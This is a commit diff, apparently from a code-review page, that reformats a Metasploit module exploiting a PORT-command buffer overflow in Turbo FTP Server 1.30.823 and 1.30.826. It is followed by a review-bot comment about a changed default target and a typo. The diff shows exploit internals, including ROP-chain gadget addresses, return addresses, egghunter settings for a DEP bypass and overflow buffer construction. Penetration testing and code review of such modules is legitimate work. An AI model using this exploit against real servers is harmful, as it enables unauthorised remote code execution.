Code cleanup
parent
6bccfcd376
commit
72d70b6bc2
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
#
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -24,49 +20,45 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
This module exploits the buffer overflow found in the PORT
|
||||
command in Turbo FTP Server 1.30.823 & 1.30.826.
|
||||
},
|
||||
'Author' => [
|
||||
'Zhao Liang', #Initial Descovery
|
||||
'Lincoln', #Metasploit
|
||||
'corelanc0d3r', #Metasploit
|
||||
'thelightcosine',#Metasploit
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'Zhao Liang', #Initial Descovery
|
||||
'Lincoln', #Metasploit
|
||||
'corelanc0d3r', #Metasploit
|
||||
'thelightcosine' #Metasploit
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$',
|
||||
'Platform' => [ 'win' ],
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '85887' ],
|
||||
[ 'OSVDB', '85887' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00",
|
||||
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
|
||||
'EncoderOptions' =>
|
||||
{
|
||||
'BufferRegister' => 'EDI',
|
||||
}
|
||||
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00",
|
||||
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
|
||||
'EncoderOptions' => { 'BufferRegister' => 'EDI' }
|
||||
},
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {} ],
|
||||
['Windows Universal TurboFtp 1.30.823',
|
||||
{
|
||||
'Ret' => 0x00411985, # RETN (ROP NOP) [tbssvc.exe]
|
||||
'ver' => 823
|
||||
'Ret' => 0x00411985, # RETN (ROP NOP) [tbssvc.exe]
|
||||
'ver' => 823
|
||||
},
|
||||
|
||||
],
|
||||
[ 'Windows Universal TurboFtp 1.30.826',
|
||||
{
|
||||
'Ret' => 0x004fb207, # RETN (ROP NOP) [tbssvc.exe]
|
||||
'ver' => 826
|
||||
'Ret' => 0x004fb207, # RETN (ROP NOP) [tbssvc.exe]
|
||||
'ver' => 826
|
||||
},
|
||||
],
|
||||
],
|
||||
|
||||
'DisclosureDate' => 'Oct 03 2012',
|
||||
'DefaultTarget' => 1))
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def check
|
||||
|
@ -82,7 +74,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
|
||||
def create_rop_chain(ver)
|
||||
|
||||
# rop chain generated with mona.py - www.corelan.be
|
||||
if ver == 823
|
||||
rop_gadgets =
|
||||
|
@ -93,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
0x00423b95, # XCHG EDX,EDI # RETN [tbssvc.exe]
|
||||
0x00423a27, # XCHG ESI,EDI # RETN [tbssvc.exe]
|
||||
0x005d1c99, # POP EBP # RETN [tbssvc.exe]
|
||||
0x004cad5d , # & jmp esp [tbssvc.exe]
|
||||
0x004cad5d, # & jmp esp [tbssvc.exe]
|
||||
0x004ab16b, # POP EBX # RETN [tbssvc.exe]
|
||||
0x00000001, # 0x00000001-> ebx
|
||||
0x005ef7f6, # POP EDX # RETN [tbssvc.exe]
|
||||
|
@ -135,7 +126,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
|
||||
my_target = target
|
||||
if my_target.name == 'Automatic'
|
||||
print_status("Automatically detecting the target")
|
||||
|
@ -162,11 +152,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
eggoptions =
|
||||
{
|
||||
:checksum => true,
|
||||
:eggtag => 'w00t',
|
||||
:depmethod => 'virtualalloc',
|
||||
:depreg => 'esi'
|
||||
:checksum => true,
|
||||
:eggtag => 'w00t',
|
||||
:depmethod => 'virtualalloc',
|
||||
:depreg => 'esi'
|
||||
}
|
||||
|
||||
badchars = "\x00"
|
||||
hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)
|
||||
|
||||
|
@ -182,7 +173,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
buf1 = rand_text_alpha(2012)
|
||||
buf1 << egg
|
||||
buf1 << rand_text_alpha(100)
|
||||
buf1 << rand_text_alpha(100)
|
||||
|
||||
buf2 = rand_text_alpha(4).unpack('C*').join(',')
|
||||
buf2 << ","
|
||||
|
|
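Review bot: The `'DefaultTarget'` line at the end of the `initialize` hunk is printed with both `1` and `0`. If the second is the new side (inferred from print order, since this page has lost its +/- markers), the default moves from the 1.30.823 entry to `'Automatic'`, which is a behaviour change rather than cleanup. The commit message "Code cleanup" does not mention it, so I would split it into its own commit or name it in the message, and add a comment on the line, e.g. `'DefaultTarget' => 0 # Automatic: target is detected at run time`. The same hunk carries the `#Initial Descovery` typo over to the reformatted `'Author'` list; `# Initial Discovery` would fix it. The enclosing `initialize` starts outside the hunk.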